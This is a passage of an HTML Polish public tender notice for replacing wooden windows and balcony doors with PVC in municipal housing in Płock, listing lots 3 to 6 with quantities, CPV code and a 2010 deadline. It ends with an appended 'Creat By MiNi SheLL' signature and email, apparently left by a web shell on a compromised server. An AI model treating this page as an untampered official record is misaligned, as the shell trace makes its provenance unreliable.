<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ROM IV -B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia. Część III (ROM IV - B)-   94 okna  i 18 drzwi balkonowych;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ROM IV - C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia. Część IV (ROM IV - C) -   86 okien  i 20 drzwi balkonowych;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ROM IV - D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.Część V (ROM IV -   D)-   83 okna  i 10 drzwi balkonowych;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ROM V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i montażem nawiewników (zgodnie z protokołami typowania) w budynkach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują Rejony Obsługi Mieszkańców administrujące budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.Część VI (ROM V) -   40 okien  i 3 drzwi balkonowe;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com